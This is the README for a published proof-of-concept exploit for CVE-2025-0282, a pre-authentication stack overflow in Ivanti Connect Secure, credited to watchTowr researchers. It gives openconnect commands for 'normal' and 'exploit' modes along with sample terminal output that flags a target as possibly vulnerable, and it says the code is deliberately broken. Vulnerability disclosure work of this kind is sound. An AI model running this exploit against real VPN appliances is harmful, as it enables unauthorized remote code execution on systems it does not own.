
Ivanti Connect Secure IFT TLS स्टैक ओवरफ़्लो प्री-ऑथ RCE (CVE-2025-0282)
Ivanti Connect Secure IFT TLS स्टैक ओवरफ्लो प्री-ऑथ RCE (CVE-2025-0282)
यह जानबूझकर गैर-तुच्छ तरीकों से तोड़ा गया है और इसे काम करने के लिए प्रयास की आवश्यकता होगी, जैसा कि पहले हमारी एक्सप्लॉइटेशन तकनीक ब्लॉगपोस्ट में बताया गया है।
इस भेद्यता को समझने के लिए, आप हमारी तकनीकी राइट-अप देख सकते हैं।
एक्सप्लॉइटेशन वॉकथ्रू और तकनीकें - Ivanti Connect Secure RCE (CVE-2025-0282)
कोड दो मोड में काम करता है:
"Normal" मोड में कोड चलाकर शुरू करें। यदि आपको पासवर्ड प्रॉम्प्ट मिलता है, तो यह इंगित करता है कि लक्ष्य कार्यशील है। फिर, "Exploit" मोड पर स्विच करें। यदि आप "Failed to complete authentication" संदेश देखते हैं, तो लक्ष्य संभावित रूप से असुरक्षित हो सकता है। ध्यान दें कि एक्सप्लॉइट कोड में हार्डकोडेड एड्रेस और ऑफसेट शामिल हैं, जिन्हें आपको अपने स्वीकृत लक्ष्य के साथ काम करने के लिए संशोधित करना होगा।
MODE=normal ./openconnect-9.12/openconnect --protocol=pulse --user=test 10.20.5.4
__ .__ ___________
__ _ _______ _/ |_ ____ | |_\__ ___/_____ _ _________
\ \/ \/ /\__ \\ __\/ ___\| | \| | / _ \ \/ \/ /\_ __ \
\ / / __ \| | \ \___| Y \ |( <_> ) / | | \/
\/\_/ (____ /__| \___ >___| /____| \____/ \/\_/ |__|
\/ \/ \/
(*) Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE (CVE-2025-0282)
- Sina Kheirkhah (@SinSinology) of watchTowr ([email protected])
CVEs: [CVE-2025-0282]
Connected to 10.20.5.4:443
SSL negotiation with 10.20.5.4
Server certificate verify failed: signer not found
Certificate from VPN server "10.20.5.4" failed verification.
Reason: signer not found
To trust this server in future, perhaps add this to your command line:
--servercert pin-sha256:kE2T2Rx2hc9EquYWABzj22wil29SZezWLdJ7OnhpdMw=
Enter 'yes' to accept, 'no' to abort; anything else to view: yes
Connected to HTTPS on 10.20.5.4 with ciphersuite (TLS1.2)-(RSA)-(AES-256-GCM)
Got HTTP response: HTTP/1.1 101 Switching Protocols
Enter user credentials:
Password:
MODE=exploit ./openconnect-9.12/openconnect --protocol=pulse --user=test 10.20.5.4
__ .__ ___________
__ _ _______ _/ |_ ____ | |_\__ ___/_____ _ _________
\ \/ \/ /\__ \\ __\/ ___\| | \| | / _ \ \/ \/ /\_ __ \
\ / / __ \| | \ \___| Y \ |( <_> ) / | | \/
\/\_/ (____ /__| \___ >___| /____| \____/ \/\_/ |__|
\/ \/ \/
(*) Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE (CVE-2025-0282)
- Sina Kheirkhah (@SinSinology) of watchTowr ([email protected])
CVEs: [CVE-2025-0282]
Connected to 10.20.5.4:443
SSL negotiation with 10.20.5.4
Server certificate verify failed: signer not found
Certificate from VPN server "10.20.5.4" failed verification.
Reason: signer not found
To trust this server in future, perhaps add this to your command line:
--servercert pin-sha256:kE2T2Rx2hc9EquYWABzj22wil29SZezWLdJ7OnhpdMw=
Enter 'yes' to accept, 'no' to abort; anything else to view: yes
Connected to HTTPS on 10.20.5.4 with ciphersuite (TLS1.2)-(RSA)-(AES-256-GCM)
Got HTTP response: HTTP/1.1 101 Switching Protocols
Failed to read from TLS/DTLS socket: Error in the pull function.
Failed to complete authentication
[!] Target might be vulnerable
यह एक्सप्लॉइट watchTowr (@watchtowrcyber) के Sina Kheirkhah (@SinSinology) द्वारा लिखा गया था।
openconnect प्रोजेक्ट, जिस पर यह कोड आधारित है
नवीनतम सुरक्षा शोध के लिए watchTowr Labs टीम को फॉलो करें।